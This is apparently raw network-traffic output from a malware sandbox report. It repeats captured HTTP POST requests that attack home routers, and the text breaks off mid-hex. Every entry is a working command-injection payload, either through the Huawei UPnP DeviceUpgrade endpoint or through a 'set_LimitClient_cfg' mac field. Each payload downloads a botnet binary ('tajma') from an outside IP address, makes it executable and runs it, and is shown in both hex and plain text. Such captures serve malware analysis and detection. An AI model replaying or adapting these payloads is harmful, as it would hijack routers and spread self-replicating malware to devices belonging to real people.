                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 